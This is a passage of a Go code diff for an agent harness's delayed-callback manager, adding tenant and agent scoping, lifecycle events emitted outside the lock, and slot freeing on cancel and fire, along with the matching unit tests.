 		return CallbackInfo{}, fmt.Errorf("delay %v is less than minimum %v", delay, MinCallbackDelay)
 	}
@@ -83,14 +191,15 @@ func (m *CallbackManager) Set(conversationID string, delay time.Duration, prompt
 	}
 
 	m.mu.Lock()
-	defer m.mu.Unlock()
 
 	if m.stopped {
+		m.mu.Unlock()
 		return CallbackInfo{}, fmt.Errorf("callback manager is shut down")
 	}
 
 	// Check per-conversation limit
 	if len(m.byConv[conversationID]) >= MaxCallbacksPerConv {
+		m.mu.Unlock()
 		return CallbackInfo{}, fmt.Errorf("conversation %s has reached the maximum of %d callbacks", conversationID, MaxCallbacksPerConv)
 	}
 
@@ -104,6 +213,8 @@ func (m *CallbackManager) Set(conversationID string, delay time.Duration, prompt
 		State:          CallbackStatePending,
 		FiresAt:        now.Add(delay),
 		CreatedAt:      now,
+		TenantID:       req.TenantID,
+		AgentID:        req.AgentID,
 	}
 
 	timer := time.AfterFunc(delay, func() {
@@ -112,6 +223,10 @@ func (m *CallbackManager) Set(conversationID string, delay time.Duration, prompt
 
 	m.callbacks[id] = &pendingCallback{info: info, timer: timer}
 	m.byConv[conversationID] = append(m.byConv[conversationID], id)
+	m.mu.Unlock()
+
+	// Emit outside the lock so the sink cannot re-enter the manager.
+	m.emitEvent(eventCallbackScheduled, info)
 
 	return info, nil
 }
@@ -119,23 +234,35 @@ func (m *CallbackManager) Set(conversationID string, delay time.Duration, prompt
 // Cancel cancels a pending callback.
 func (m *CallbackManager) Cancel(id string) (CallbackInfo, error) {
 	m.mu.Lock()
-	defer m.mu.Unlock()
 
 	cb, ok := m.callbacks[id]
 	if !ok {
+		m.mu.Unlock()
 		return CallbackInfo{}, fmt.Errorf("callback %s not found", id)
 	}
 
 	switch cb.info.State {
 	case CallbackStateFired:
+		m.mu.Unlock()
 		return CallbackInfo{}, fmt.Errorf("callback %s already fired", id)
 	case CallbackStateCanceled:
+		m.mu.Unlock()
 		return CallbackInfo{}, fmt.Errorf("callback %s already canceled", id)
 	}
 
 	cb.timer.Stop()
 	cb.info.State = CallbackStateCanceled
-	return cb.info, nil
+	info := cb.info
+	// Remove from byConv so the slot is freed for future callbacks on this
+	// conversation. The callbacks map entry is kept so state can still be
+	// queried by white-box tests; only the per-conversation slot matters.
+	m.removeFromByConv(info.ConversationID, id)
+	m.mu.Unlock()
+
+	// Emit outside the lock so the sink cannot re-enter the manager.
+	m.emitEvent(eventCallbackCanceled, info)
+
+	return info, nil
 }
 
 // List returns all callbacks for a conversation.
@@ -156,14 +283,24 @@ func (m *CallbackManager) List(conversationID string) []CallbackInfo {
 // Shutdown stops all pending callbacks and prevents new ones.
 func (m *CallbackManager) Shutdown() {
 	m.mu.Lock()
-	defer m.mu.Unlock()
 
 	m.stopped = true
+	var canceled []CallbackInfo
 	for _, cb := range m.callbacks {
 		if cb.info.State == CallbackStatePending {
 			cb.timer.Stop()
 			cb.info.State = CallbackStateCanceled
+			canceled = append(canceled, cb.info)
+			// Remove from byConv so slots are freed (prevents leaked entries
+			// if the manager is reused or inspected after shutdown).
+			m.removeFromByConv(cb.info.ConversationID, cb.info.ID)
 		}
+	}
+	m.mu.Unlock()
+
+	// Emit outside the lock so the sink cannot re-enter the manager.
+	for _, info := range canceled {
+		m.emitEvent(eventCallbackCanceled, info)
 	}
 }
 
@@ -176,12 +313,23 @@ func (m *CallbackManager) fire(id string) {
 		return
 	}
 	cb.info.State = CallbackStateFired
-	convID := cb.info.ConversationID
-	prompt := cb.info.Prompt
+	info := cb.info
+	convID := info.ConversationID
+	prompt := info.Prompt
+	tenantID := info.TenantID
+	agentID := info.AgentID
+	// Remove from byConv so the slot is freed for future callbacks on this
+	// conversation. The callbacks map entry is kept so state can still be
+	// queried; only the per-conversation slot counter matters for the limit.
+	m.removeFromByConv(convID, id)
 	m.mu.Unlock()
 
-	// Call StartRun outside the lock to avoid deadlocks
-	if err := m.starter.StartRun(prompt, convID); err != nil {
+	// Emit outside the lock so the sink cannot re-enter the manager.
+	m.emitEvent(eventCallbackFired, info)
+
+	// Call StartRun outside the lock to avoid deadlocks. Carry the originating
+	// run's tenant + agent so the follow-up run runs on the same scope.
+	if err := m.starter.StartRun(prompt, convID, tenantID, agentID); err != nil {
 		// Log error but callback is still marked as fired
 		log.Printf("callback %s: StartRun error: %v", id, err)
 	}
@@ -230,7 +378,13 @@ func setDelayedCallbackTool(mgr *CallbackManager) Tool {
 			return "", fmt.Errorf("set_delayed_callback: no run metadata in context")
 		}
 
-		info, err := mgr.Set(md.ConversationID, delay, args.Prompt)
+		info, err := mgr.Set(SetRequest{
+			ConversationID: md.ConversationID,
+			Delay:          delay,
+			Prompt:         args.Prompt,
+			TenantID:       md.TenantID,
+			AgentID:        md.AgentID,
+		})
 		if err != nil {
 			return "", fmt.Errorf("set_delayed_callback failed: %w", err)
 		}

--- a/internal/harness/tools/delayed_callback_events_test.go
+++ b/internal/harness/tools/delayed_callback_events_test.go
@@ -1,0 +1,216 @@
+package tools
+
+import (
+	"sync"
+	"testing"
+	"time"
+)
+
+// capturingSink records every callback event emitted by the CallbackManager so
+// the lifecycle (scheduled/fired/canceled) can be asserted deterministically.
+type capturingSink struct {
+	mu     sync.Mutex
+	events []sinkEvent
+}
+
+type sinkEvent struct {
+	Event string
+	Info  CallbackInfo
+}
+
+func (s *capturingSink) Emit(event string, info CallbackInfo) {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+	s.events = append(s.events, sinkEvent{Event: event, Info: info})
+}
+
+func (s *capturingSink) snapshot() []sinkEvent {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+	out := make([]sinkEvent, len(s.events))
+	copy(out, s.events)
+	return out
+}
+
+func (s *capturingSink) byType(event string) []sinkEvent {
+	out := make([]sinkEvent, 0)
+	for _, e := range s.snapshot() {
+		if e.Event == event {
+			out = append(out, e)
+		}
+	}
+	return out
+}
+
+// fixedClock returns a deterministic fake clock seeded at t.
+func fixedClock(t time.Time) func() time.Time {
+	return func() time.Time { return t }
+}
+
+func TestCallbackEventsLifecycle(t *testing.T) {
+	base := time.Date(2026, 6, 23, 9, 0, 0, 0, time.UTC)
+
+	t.Run("scheduled emitted on Set with fires_at", func(t *testing.T) {
+		sink := &capturingSink{}
+		starter := &mockRunStarter{}
+		mgr := NewCallbackManager(starter, WithEventSink(sink))
+		mgr.now = fixedClock(base)
+		defer mgr.Shutdown()
+
+		info, err := mgr.Set(setReq("conv-1", 30*time.Second, "check deploy"))
+		if err != nil {
+			t.Fatalf("unexpected error: %v", err)
+		}
+
+		scheduled := sink.byType("callback.scheduled")
+		if len(scheduled) != 1 {
+			t.Fatalf("expected 1 callback.scheduled event, got %d", len(scheduled))
+		}
+		got := scheduled[0].Info
+		if got.ID != info.ID {
+			t.Errorf("scheduled event ID = %q, want %q", got.ID, info.ID)
+		}
+		if got.State != CallbackStatePending {
+			t.Errorf("scheduled event state = %q, want pending", got.State)
+		}
+		wantFiresAt := base.Add(30 * time.Second)
+		if !got.FiresAt.Equal(wantFiresAt) {
+			t.Errorf("scheduled event fires_at = %v, want %v", got.FiresAt, wantFiresAt)
+		}
+		if got.ConversationID != "conv-1" {
+			t.Errorf("scheduled event conv = %q, want conv-1", got.ConversationID)
+		}
+	})
+
+	t.Run("no scheduled event when Set fails validation", func(t *testing.T) {
+		sink := &capturingSink{}
+		mgr := NewCallbackManager(&mockRunStarter{}, WithEventSink(sink))
+		defer mgr.Shutdown()
+
+		if _, err := mgr.Set(setReq("conv-1", 1*time.Second, "too short")); err == nil {
+			t.Fatal("expected error for too-short delay")
+		}
+		if n := len(sink.byType("callback.scheduled")); n != 0 {
+			t.Errorf("expected 0 scheduled events on failed Set, got %d", n)
+		}
+	})
+
+	t.Run("fired emitted when callback fires", func(t *testing.T) {
+		sink := &capturingSink{}
+		starter := &mockRunStarter{}
+		mgr := NewCallbackManager(starter, WithEventSink(sink))
+		mgr.now = fixedClock(base)
+		defer mgr.Shutdown()
+
+		info, err := mgr.Set(setReq("conv-1", 5*time.Second, "wake up"))
+		if err != nil {
+			t.Fatalf("unexpected error: %v", err)
+		}
+
+		// Stop the real timer; drive fire directly (no real sleeps).
+		mgr.mu.Lock()
+		mgr.callbacks[info.ID].timer.Stop()
+		mgr.mu.Unlock()
+
+		mgr.fire(info.ID)
+
+		fired := sink.byType("callback.fired")
+		if len(fired) != 1 {
+			t.Fatalf("expected 1 callback.fired event, got %d", len(fired))
+		}
+		if fired[0].Info.ID != info.ID {
+			t.Errorf("fired event ID = %q, want %q", fired[0].Info.ID, info.ID)
+		}
+		if fired[0].Info.State != CallbackStateFired {
+			t.Errorf("fired event state = %q, want fired", fired[0].Info.State)
+		}
+	})
+
+	t.Run("no duplicate fired on second fire", func(t *testing.T) {
+		sink := &capturingSink{}
+		mgr := NewCallbackManager(&mockRunStarter{}, WithEventSink(sink))
+		defer mgr.Shutdown()
+
+		info, _ := mgr.Set(setReq("conv-1", 5*time.Second, "wake up"))
+		mgr.mu.Lock()
+		mgr.callbacks[info.ID].timer.Stop()
+		mgr.mu.Unlock()
+
+		mgr.fire(info.ID)
+		mgr.fire(info.ID) // no-op
+
+		if n := len(sink.byType("callback.fired")); n != 1 {
+			t.Errorf("expected exactly 1 fired event, got %d", n)
+		}
+	})
+
+	t.Run("canceled emitted on Cancel", func(t *testing.T) {
+		sink := &capturingSink{}
+		mgr := NewCallbackManager(&mockRunStarter{}, WithEventSink(sink))
+		defer mgr.Shutdown()
+
+		info, _ := mgr.Set(setReq("conv-1", 30*time.Second, "check"))
+		if _, err := mgr.Cancel(info.ID); err != nil {
+			t.Fatalf("unexpected cancel error: %v", err)
+		}
+
+		canceled := sink.byType("callback.canceled")
+		if len(canceled) != 1 {
+			t.Fatalf("expected 1 callback.canceled event, got %d", len(canceled))
+		}
+		if canceled[0].Info.ID != info.ID {
+			t.Errorf("canceled event ID = %q, want %q", canceled[0].Info.ID, info.ID)
+		}
+		if canceled[0].Info.State != CallbackStateCanceled {
+			t.Errorf("canceled event state = %q, want canceled", canceled[0].Info.State)
+		}
+	})
+
+	t.Run("no canceled event when Cancel fails", func(t *testing.T) {
+		sink := &capturingSink{}
+		mgr := NewCallbackManager(&mockRunStarter{}, WithEventSink(sink))
+		defer mgr.Shutdown()
+
+		if _, err := mgr.Cancel("does-not-exist"); err == nil {
+			t.Fatal("expected error canceling nonexistent callback")
+		}
+		if n := len(sink.byType("callback.canceled")); n != 0 {
+			t.Errorf("expected 0 canceled events on failed Cancel, got %d", n)
+		}
+	})
+
+	t.Run("canceled emitted for each pending callback on Shutdown", func(t *testing.T) {
+		sink := &capturingSink{}
+		mgr := NewCallbackManager(&mockRunStarter{}, WithEventSink(sink))
+
+		_, _ = mgr.Set(setReq("conv-1", 30*time.Second, "a"))
+		_, _ = mgr.Set(setReq("conv-1", 30*time.Second, "b"))
+
+		mgr.Shutdown()
+
+		canceled := sink.byType("callback.canceled")
+		if len(canceled) != 2 {
+			t.Fatalf("expected 2 canceled events on shutdown, got %d", len(canceled))
+		}
+		for _, e := range canceled {
+			if e.Info.State != CallbackStateCanceled {
+				t.Errorf("shutdown canceled event state = %q, want canceled", e.Info.State)
+			}
+		}
+	})
+
+	t.Run("nil sink is a no-op (default constructor)", func(t *testing.T) {
+		mgr := NewCallbackManager(&mockRunStarter{})
+		defer mgr.Shutdown()
+
+		info, err := mgr.Set(setReq("conv-1", 5*time.Second, "check"))
+		if err != nil {
+			t.Fatalf("unexpected error with nil sink: %v", err)
+		}
+		mgr.mu.Lock()
+		mgr.callbacks[info.ID].timer.Stop()
+		mgr.mu.Unlock()
+		mgr.fire(info.ID)          // must not panic
+		_, _ = mgr.Cancel(info.ID) // already fired -> error, must not panic
+	})
+}

--- a/internal/harness/tools/delayed_callback_test.go
+++ b/internal/harness/tools/delayed_callback_test.go
@@ -16,20 +16,34 @@ type mockRunStarter struct {
 	mu      sync.Mutex
 	calls   []startRunCall
 	err     error
-	startFn func(prompt, convID string) error
+	startFn func(prompt, convID, tenantID, agentID string) error
+}
+
+// setReq is a small helper for tests that schedule callbacks via the manager
+// directly (not through the tool handler). It builds a SetRequest with the
+// given conversation/delay/prompt and an empty (default/unscoped) tenant+agent.
+func setReq(convID string, delay time.Duration, prompt string) SetRequest {
+	return SetRequest{ConversationID: convID, Delay: delay, Prompt: prompt}
 }
 
 type startRunCall struct {
 	Prompt         string
 	ConversationID string
+	TenantID       string
+	AgentID        string
 }
 
-func (m *mockRunStarter) StartRun(prompt, conversationID string) error {
+func (m *mockRunStarter) StartRun(prompt, conversationID, tenantID, agentID string) error {
 	m.mu.Lock()
 	defer m.mu.Unlock()
-	m.calls = append(m.calls, startRunCall{Prompt: prompt, ConversationID: conversationID})
+	m.calls = append(m.calls, startRunCall{
+		Prompt:         prompt,
+		ConversationID: conversationID,
+		TenantID:       tenantID,
+		AgentID:        agentID,
+	})
 	if m.startFn != nil {
-		return m.startFn(prompt, conversationID)
+		return m.startFn(prompt, conversationID, tenantID, agentID)
 	}
 	return m.err
 }
@@ -50,7 +64,7 @@ func TestCallbackManagerSet(t *testing.T) {
 		mgr := NewCallbackManager(starter)
 		defer mgr.Shutdown()
 
-		info, err := mgr.Set("conv-1", 10*time.Second, "check status")
+		info, err := mgr.Set(setReq("conv-1", 10*time.Second, "check status"))
 		if err != nil {
 			t.Fatalf("unexpected error: %v", err)
 		}
@@ -76,7 +90,7 @@ func TestCallbackManagerSet(t *testing.T) {
 		mgr := NewCallbackManager(starter)
 		defer mgr.Shutdown()
 
-		_, err := mgr.Set("conv-1", 1*time.Second, "check")
+		_, err := mgr.Set(setReq("conv-1", 1*time.Second, "check"))
 		if err == nil {
 			t.Fatal("expected error for short delay")
 		}
@@ -87,7 +101,7 @@ func TestCallbackManagerSet(t *testing.T) {
 		mgr := NewCallbackManager(starter)
 		defer mgr.Shutdown()
 
-		_, err := mgr.Set("conv-1", 2*time.Hour, "check")
+		_, err := mgr.Set(setReq("conv-1", 2*time.Hour, "check"))
 		if err == nil {
 			t.Fatal("expected error for long delay")
 		}
@@ -98,7 +112,7 @@ func TestCallbackManagerSet(t *testing.T) {
 		mgr := NewCallbackManager(starter)
 		defer mgr.Shutdown()
 
-		_, err := mgr.Set("conv-1", 10*time.Second, "")
+		_, err := mgr.Set(setReq("conv-1", 10*time.Second, ""))
 		if err == nil {
 			t.Fatal("expected error for empty prompt")
 		}
@@ -110,13 +124,13 @@ func TestCallbackManagerSet(t *testing.T) {
 		defer mgr.Shutdown()
 
 		for i := 0; i < MaxCallbacksPerConv; i++ {
-			_, err := mgr.Set("conv-1", 30*time.Second, fmt.Sprintf("check %d", i))
+			_, err := mgr.Set(setReq("conv-1", 30*time.Second, fmt.Sprintf("check %d", i)))
 			if err != nil {
 				t.Fatalf("unexpected error on callback %d: %v", i, err)
 			}
 		}
 
-		_, err := mgr.Set("conv-1", 30*time.Second, "one too many")
+		_, err := mgr.Set(setReq("conv-1", 30*time.Second, "one too many"))
 		if err == nil {
 			t.Fatal("expected error exceeding max callbacks")
 		}
@@ -128,14 +142,14 @@ func TestCallbackManagerSet(t *testing.T) {
 		defer mgr.Shutdown()
 
 		for i := 0; i < MaxCallbacksPerConv; i++ {
-			_, err := mgr.Set("conv-1", 30*time.Second, fmt.Sprintf("check %d", i))
+			_, err := mgr.Set(setReq("conv-1", 30*time.Second, fmt.Sprintf("check %d", i)))
 			if err != nil {
 				t.Fatalf("unexpected error: %v", err)
 			}
 		}
 
 		// Different conversation should still work
-		_, err := mgr.Set("conv-2", 30*time.Second, "check")
+		_, err := mgr.Set(setReq("conv-2", 30*time.Second, "check"))
 		if err != nil {
 			t.Fatalf("unexpected error for different conversation: %v", err)
 		}
@@ -146,7 +160,7 @@ func TestCallbackManagerSet(t *testing.T) {
 		mgr := NewCallbackManager(starter)
 		mgr.Shutdown()
 
-		_, err := mgr.Set("conv-1", 10*time.Second, "check")
+		_, err := mgr.Set(setReq("conv-1", 10*time.Second, "check"))
 		if err == nil {
 			t.Fatal("expected error after shutdown")
 		}
@@ -159,7 +173,7 @@ func TestCallbackManagerCancel(t *testing.T) {
 		mgr := NewCallbackManager(starter)
 		defer mgr.Shutdown()
 
-		info, _ := mgr.Set("conv-1", 30*time.Second, "check")
+		info, _ := mgr.Set(setReq("conv-1", 30*time.Second, "check"))
 		canceled, err := mgr.Cancel(info.ID)
 		if err != nil {
 			t.Fatalf("unexpected error: %v", err)
@@ -185,7 +199,7 @@ func TestCallbackManagerCancel(t *testing.T) {
 		mgr := NewCallbackManager(starter)
 		defer mgr.Shutdown()
 
-		info, _ := mgr.Set("conv-1", 30*time.Second, "check")
+		info, _ := mgr.Set(setReq("conv-1", 30*time.Second, "check"))
 		mgr.Cancel(info.ID)
 
 		_, err := mgr.Cancel(info.ID)
@@ -212,9 +226,9 @@ func TestCallbackManagerList(t *testing.T) {
 		mgr := NewCallbackManager(starter)
 		defer mgr.Shutdown()
 
-		mgr.Set("conv-1", 10*time.Second, "check 1")
-		mgr.Set("conv-1", 20*time.Second, "check 2")
-		mgr.Set("conv-2", 10*time.Second, "check 3") // different conv
+		mgr.Set(setReq("conv-1", 10*time.Second, "check 1"))
+		mgr.Set(setReq("conv-1", 20*time.Second, "check 2"))
+		mgr.Set(setReq("conv-2", 10*time.Second, "check 3")) // different conv
 
 		callbacks := mgr.List("conv-1")
 		if len(callbacks) != 2 {
@@ -235,7 +249,7 @@ func TestCallbackManagerFire(t *testing.T) {
 		mgr.now = func() time.Time { return time.Date(2026, 3, 8, 12, 0, 0, 0, time.UTC) }
 		defer mgr.Shutdown()
 
-		info, err := mgr.Set("conv-1", 5*time.Second, "check deployment")
+		info, err := mgr.Set(setReq("conv-1", 5*time.Second, "check deployment"))
 		if err != nil {
 			t.Fatalf("unexpected error: %v", err)
 		}
@@ -273,7 +287,7 @@ func TestCallbackManagerFire(t *testing.T) {
 		mgr := NewCallbackManager(starter)
 		defer mgr.Shutdown()
 
-		info, _ := mgr.Set("conv-1", 5*time.Second, "check")
+		info, _ := mgr.Set(setReq("conv-1", 5*time.Second, "check"))
 
 		mgr.mu.Lock()
 		mgr.callbacks[info.ID].timer.Stop()
@@ -294,7 +308,7 @@ func TestCallbackManagerFire(t *testing.T) {
 		mgr := NewCallbackManager(starter)
 		defer mgr.Shutdown()
 
-		info, _ := mgr.Set("conv-1", 5*time.Second, "check")
+		info, _ := mgr.Set(setReq("conv-1", 5*time.Second, "check"))
 
 		mgr.mu.Lock()
 		mgr.callbacks[info.ID].timer.Stop()
@@ -314,7 +328,7 @@ func TestCallbackManagerFire(t *testing.T) {
 		mgr := NewCallbackManager(starter)
 		defer mgr.Shutdown()
 
-		info, _ := mgr.Set("conv-1", 5*time.Second, "check")
+		info, _ := mgr.Set(setReq("conv-1", 5*time.Second, "check"))
 
 		mgr.mu.Lock()
 		mgr.callbacks[info.ID].timer.Stop()
@@ -334,7 +348,7 @@ func TestCallbackManagerFire(t *testing.T) {
 		defer mgr.Shutdown()
 
 		// Use minimum delay so it fires quickly
-		_, err := mgr.Set("conv-1", 5*time.Second, "check")
+		_, err := mgr.Set(setReq("conv-1", 5*time.Second, "check"))
 		if err != nil {
 			t.Fatalf("unexpected error: %v", err)
 		}
@@ -364,8 +378,8 @@ func TestCallbackManagerShutdown(t *testing.T) {
 		starter := &mockRunStarter{}
 		mgr := NewCallbackManager(starter)
 
-		mgr.Set("conv-1", 30*time.Second, "check 1")
-		mgr.Set("conv-1", 30*time.Second, "check 2")
+		mgr.Set(setReq("conv-1", 30*time.Second, "check 1"))
+		mgr.Set(setReq("conv-1", 30*time.Second, "check 2"))
 
 		mgr.Shutdown()
 
@@ -399,7 +413,7 @@ func TestCallbackManagerConcurrent(t *testing.T) {
 		go func(i int) {
 			defer wg.Done()
 			convID := fmt.Sprintf("conv-%d", i%3)
-			_, err := mgr.Set(convID, 30*time.Second, fmt.Sprintf("check %d", i))
+			_, err := mgr.Set(setReq(convID, 30*time.Second, fmt.Sprintf("check %d", i)))
 			if err == nil {
 				atomic.AddInt32(&setCount, 1)
 			}
@@ -507,7 +521,7 @@ func TestCancelDelayedCallbackTool(t *testing.T) {
 		mgr := NewCallbackManager(starter)
 		defer mgr.Shutdown()
 
-		info, _ := mgr.Set("conv-1", 30*time.Second, "check")
+		info, _ := mgr.Set(setReq("conv-1", 30*time.Second, "check"))
 
 		tool := cancelDelayedCallbackTool(mgr)
 		ctx := testContextWithConversation("conv-1")
@@ -558,8 +572,8 @@ func TestListDelayedCallbacksTool(t *testing.T) {
 		mgr := NewCallbackManager(starter)
 		defer mgr.Shutdown()
 
-		mgr.Set("conv-1", 10*time.Second, "check 1")
-		mgr.Set("conv-1", 20*time.Second, "check 2")
+		mgr.Set(setReq("conv-1", 10*time.Second, "check 1"))
+		mgr.Set(setReq("conv-1", 20*time.Second, "check 2"))
 
 		tool := listDelayedCallbacksTool(mgr)
 		ctx := testContextWithConversation("conv-1")
@@ -599,7 +613,7 @@ func TestRegression_ConcurrentFireAndCancel(t *testing.T) {
 	mgr := NewCallbackManager(starter)
 	defer mgr.Shutdown()
 
-	info, err := mgr.Set("conv-1", 10*time.Second, "check deploy")
+	info, err := mgr.Set(setReq("conv-1", 10*time.Second, "check deploy"))
 	if err != nil {
 		t.Fatalf("unexpected error: %v", err)
 	}
@@ -648,7 +662,7 @@ func TestRegression_ConcurrentShutdownAndSet(t *testing.T) {
 		wg.Add(1)
 		go func(i int) {
 			defer wg.Done()
-			_, err := mgr.Set("conv-1", 30*time.Second, fmt.Sprintf("check %d", i))
+			_, err := mgr.Set(setReq("conv-1", 30*time.Second, fmt.Sprintf("check %d", i)))
 			if err != nil {
 				atomic.AddInt32(&errCount, 1)
 			} else {
@@ -703,7 +717,7 @@ func TestRegression_HighConcurrency(t *testing.T) {
 
 			switch i % 4 {
 			case 0: // Set
-				info, err := mgr.Set(convID, 30*time.Second, fmt.Sprintf("check %d", i))
+				info, err := mgr.Set(setReq(convID, 30*time.Second, fmt.Sprintf("check %d", i)))
 				if err == nil {
 					idMu.Lock()
 					ids = append(ids, info.ID)
@@ -765,7 +779,7 @@ func TestRegression_HighConcurrency(t *testing.T) {
 
 func TestRegression_FireWithSlowStartRun(t *testing.T) {
 	starter := &mockRunStarter{
-		startFn: func(prompt, convID string) error {
+		startFn: func(prompt, convID, tenantID, agentID string) error {
 			time.Sleep(100 * time.Millisecond)
 			return nil
 		},
@@ -776,7 +790,7 @@ func TestRegression_FireWithSlowStartRun(t *testing.T) {
 	const count = 5
 	infos := make([]CallbackInfo, count)
 	for i := 0; i < count; i++ {
-		info, err := mgr.Set("conv-1", 30*time.Second, fmt.Sprintf("check %d", i))
+		info, err := mgr.Set(setReq("conv-1", 30*time.Second, fmt.Sprintf("check %d", i)))
 		if err != nil {
 			t.Fatalf("unexpected error: %v", err)
 		}
@@ -821,7 +835,7 @@ func TestRegression_CancelDuringFire(t *testing.T) {
 	// StartRun that takes 200ms, giving us time to attempt Cancel
 	fireDone := make(chan struct{})
 	starter := &mockRunStarter{
-		startFn: func(prompt, convID string) error {
+		startFn: func(prompt, convID, tenantID, agentID string) error {
 			time.Sleep(200 * time.Millisecond)
 			return nil
 		},
@@ -829,7 +843,7 @@ func TestRegression_CancelDuringFire(t *testing.T) {
 	mgr := NewCallbackManager(starter)
 	defer mgr.Shutdown()
 
-	info, err := mgr.Set("conv-1", 30*time.Second, "check deploy")
+	info, err := mgr.Set(setReq("conv-1", 30*time.Second, "check deploy"))
 	if err != nil {
 		t.Fatalf("unexpected error: %v", err)
 	}
@@ -875,7 +889,7 @@ func TestRegression_ExactBoundaryDelays(t *testing.T) {
 		mgr := NewCallbackManager(starter)
 		defer mgr.Shutdown()
 
-		_, err := mgr.Set("conv-1", MinCallbackDelay, "check")
+		_, err := mgr.Set(setReq("conv-1", MinCallbackDelay, "check"))
 		if err != nil {
 			t.Errorf("expected success at exact minimum delay, got: %v", err)
 		}
@@ -885,7 +899,7 @@ func TestRegression_ExactBoundaryDelays(t *testing.T) {
 		mgr := NewCallbackManager(starter)
 		defer mgr.Shutdown()
 
-		info, err := mgr.Set("conv-1", MaxCallbackDelay, "check")
+		info, err := mgr.Set(setReq("conv-1", MaxCallbackDelay, "check"))
 		if err != nil {
 			t.Errorf("expected success at exact maximum delay, got: %v", err)
 		}
@@ -900,7 +914,7 @@ func TestRegression_ExactBoundaryDelays(t *testing.T) {
 		mgr := NewCallbackManager(starter)
 		defer mgr.Shutdown()
 
-		_, err := mgr.Set("conv-1", MinCallbackDelay-1*time.Nanosecond, "check")
+		_, err := mgr.Set(setReq("conv-1", MinCallbackDelay-1*time.Nanosecond, "check"))
 		if err == nil {
 			t.Error("expected error for delay just below minimum")
 		}
@@ -910,7 +924,7 @@ func TestRegression_ExactBoundaryDelays(t *testing.T) {
 		mgr := NewCallbackManager(starter)
 		defer mgr.Shutdown()
 
-		_, err := mgr.Set("conv-1", MaxCallbackDelay+1*time.Nanosecond, "check")
+		_, err := mgr.Set(setReq("conv-1", MaxCallbackDelay+1*time.Nanosecond, "check"))
 		if err == nil {
 			t.Error("expected error for delay just above maximum")
 		}
@@ -923,7 +937,7 @@ func TestRegression_EmptyConversationID(t *testing.T) {
 	defer mgr.Shutdown()
 
 	// Empty conversation ID should still work — no validation on conv ID
-	info, err := mgr.Set("", 10*time.Second, "check")
+	info, err := mgr.Set(setReq("", 10*time.Second, "check"))
 	if err != nil {
 		t.Fatalf("expected empty conv ID to work, got error: %v", err)
 	}
@@ -959,33 +973,53 @@ func TestRegression_MaxCallbacksBoundary(t *testing.T) {
 	mgr := NewCallbackManager(starter)
 	defer mgr.Shutdown()
 
-	// Set exactly MaxCallbacksPerConv callbacks — should all succeed
+	// Set exactly MaxCallbacksPerConv callbacks — should all succeed.
 	ids := make([]string, MaxCallbacksPerConv)
 	for i := 0; i < MaxCallbacksPerConv; i++ {
-		info, err := mgr.Set("conv-1", 30*time.Second, fmt.Sprintf("check %d", i))
+		info, err := mgr.Set(setReq("conv-1", 30*time.Second, fmt.Sprintf("check %d", i)))
 		if err != nil {
 			t.Fatalf("unexpected error on callback %d: %v", i, err)
 		}
 		ids[i] = info.ID
 	}
 
-	// One more should fail
-	_, err := mgr.Set("conv-1", 30*time.Second, "one too many")
+	// One more should fail — slot is full.
+	_, err := mgr.Set(setReq("conv-1", 30*time.Second, "one too many"))
 	if err == nil {
 		t.Fatal("expected error exceeding max callbacks")
 	}
 
-	// Cancel one callback
+	// Cancel one callback — this must free the slot.
 	_, err = mgr.Cancel(ids[0])
 	if err != nil {
 		t.Fatalf("unexpected cancel error: %v", err)
 	}
 
-	// Try to set another — should still fail because canceled callbacks
-	// still count in the byConv slice (IDs are never removed)
-	_, err = mgr.Set("conv-1", 30*time.Second, "after cancel")
-	if err == nil {
-		t.Fatal("expected error: canceled callbacks still count in byConv slice")
+	// After canceling, a new Set for the same conversation MUST succeed (slot freed).
+	_, err = mgr.Set(setReq("conv-1", 30*time.Second, "after cancel"))
+	if err != nil {
+		t.Fatalf("expected Set to succeed after cancel freed a slot, got: %v", err)
+	}
+
+	// Fire one of the remaining pending callbacks manually and verify slot is freed.
+	// ids[1] is still pending — stop its real timer then fire it directly.
+	mgr.mu.Lock()
+	mgr.callbacks[ids[1]].timer.Stop()
+	mgr.mu.Unlock()
+	mgr.fire(ids[1])
+
+	// After firing, another new Set must also succeed.
+	_, err = mgr.Set(setReq("conv-1", 30*time.Second, "after fire"))
+	if err != nil {
+		t.Fatalf("expected Set to succeed after fire freed a slot, got: %v", err)
+	}
+
+	// List must still show only non-pruned entries for this conversation.
+	listed := mgr.List("conv-1")
+	// ids[0] was canceled (pruned from byConv), ids[1] was fired (pruned from byConv);
+	// remaining entries are ids[2..9] (8 pending) + "after cancel" + "after fire" = 10 total.
+	if len(listed) != MaxCallbacksPerConv {
+		t.Errorf("expected List to return %d callbacks after prune, got %d", MaxCallbacksPerConv, len(listed))
 	}
 }
 
@@ -1009,7 +1043,7 @@ func TestRegression_MultiConversationConcurrentFire(t *testing.T) {
 	for i := 0; i < convCount; i++ {
 		convID := fmt.Sprintf("conv-%d", i)
 		prompt := fmt.Sprintf("check deployment %d", i)
-		info, err := mgr.Set(convID, 10*time.Second, prompt)
+		info, err := mgr.Set(setReq(convID, 10*time.Second, prompt))
 		if err != nil {
 			t.Fatalf("unexpected error: %v", err)
 		}
@@ -1066,7 +1100,7 @@ func TestRegression_MultiConversationConcurrentFire(t *testing.T) {
 func TestRegression_ListDuringFire(t *testing.T) {
 	// Use slow StartRun so fire() is still in progress when we call List()
 	starter := &mockRunStarter{
-		startFn: func(prompt, convID string) error {
+		startFn: func(prompt, convID, tenantID, agentID string) error {
 			time.Sleep(200 * time.Millisecond)
 			return nil
 		},
@@ -1074,7 +1108,7 @@ func TestRegression_ListDuringFire(t *testing.T) {
 	mgr := NewCallbackManager(starter)
 	defer mgr.Shutdown()
 
-	info, err := mgr.Set("conv-1", 30*time.Second, "check deploy")
+	info, err := mgr.Set(setReq("conv-1", 30*time.Second, "check deploy"))
 	if err != nil {
 		t.Fatalf("unexpected error: %v", err)
 	}
@@ -1092,15 +1126,23 @@ func TestRegression_ListDuringFire(t *testing.T) {
 	// Wait a bit for fire() to acquire lock and set state
 	time.Sleep(20 * time.Millisecond)
 
-	// List while fire() is still calling StartRun (but after it released the lock)
+	// P3 (BUG A fix): fire() removes the id from byConv before releasing the
+	// lock, so List returns 0 entries — the slot is freed immediately.
 	callbacks := mgr.List("conv-1")
-	if len(callbacks) != 1 {
-		t.Fatalf("expected 1 callback, got %d", len(callbacks))
+	if len(callbacks) != 0 {
+		t.Fatalf("expected 0 callbacks after fire() removed from byConv, got %d", len(callbacks))
 	}
 
-	// fire() sets state to "fired" before releasing lock, so List should see "fired"
